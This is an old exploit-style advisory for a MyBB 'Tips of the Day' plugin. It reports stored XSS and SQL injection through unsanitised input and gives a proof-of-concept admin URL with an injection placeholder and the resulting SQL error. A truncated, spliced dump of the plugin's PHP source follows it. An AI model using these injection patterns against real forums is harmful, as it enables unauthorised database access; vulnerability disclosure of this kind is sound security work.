# Exploit Title: TipsOfTheDay mybb plugin stored XSS and SQL injection vulnerabilitys. # Date: 12.12.2012 # Exploit Author: VipVince # Vendor Homepage: http://www.mybb.com/ # Software Link: http://mods.mybb.com/view/tips-of-the-day # Version: 1.0 # Tested on: Windows The tipsoftheday.php file is vulnerable to two common web vulnerability's. I will demonstrate below: **********************************Stored XSS.********************************************** The vulnerability lies here. simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']); ?> And can be exploited here. http://www.server.com/dir/misc.php?tips=newtip Add into the boxes as newtip and then refresh the page. Bingo our stored XSS pop up. **************************************** SQLi Vuln *************************************************** simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']); $tip = $db->fetch_array($query); ?> As you can see has not been sanitized. It can be exploited via admin panel. POC below: http://www.server.com/bladir/admin/index.php?module=config-tipsoftheday&action=edittip&tip=[VAILD_ID]'[SQLi] Result. [quote] MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Query: SELECT * FROM mybb_tipsoftheday WHERE totdid=1' [/quote] Brought to you by VipVince. Enjoy the 12/12/2012 "it only comes once" and all that bullshit.
Please make sure IN_MYBB is defined."); } $plugins->add_hook("admin_config_menu", "tipsoftheday_admin_nav"); $plugins->add_hook("admin_config_action_handler", "tipsoftheday_action_handler"); $plugins->add_hook("admin_load", "tipsoftheday_admin"); $plugins->add_hook("index_start", "tipsoftheday_index"); $plugins->add_hook("misc_start", "tipsusers"); function tipsoftheday_info() { global $lang; $lang->load("config_tipsoftheday", false, true); return array( "name" => $lang->name, "description" => $lang->descriptionplugin, "website" => "http://mybb-es.com", "author" => "Edson Ordaz", "authorsite" => "http://mybb-es.com", "version" => "1.0", "guid" => "f52d89922b319c5256b23cd1b3f09eb1", "compatibility" => "*" ); } function tipsoftheday_activate() { global $db,$lang,$message; $message .= $lang->activatemessage; $lang->load("config_tipsoftheday", false, true); if(!$db->table_exists("tipsoftheday") && !$db->table_exists("tipsoftheday_users")) { $db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday` ( `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) NOT NULL, `tiptle` text NOT NULL DEFAULT '', `tip` text NOT NULL DEFAULT '', PRIMARY KEY (`totdid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;"); $db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday_users` ( `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) NOT NULL, `tiptle` text NOT NULL DEFAULT '', `tip` text NOT NULL DEFAULT '', PRIMARY KEY (`totdid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;"); } $tipsoftheday = array( "tid" => "NULL", "title" => 'tipsoftheday', "template" => $db->escape_string(' {$tip[\'tiptle\']}
{$tip[\'tip\']}

'), "sid" => "-1", ); $tipsoftheday_newtip = array( "tid" => "NULL", "title" => 'tipsoftheday_newtip', "template" => $db->escape_string(' {$lang->newtiptab} {$headerinclude} {$header}
{$lang->newtiptab}
{$lang->newtipsubject}
{$lang->newtipbody}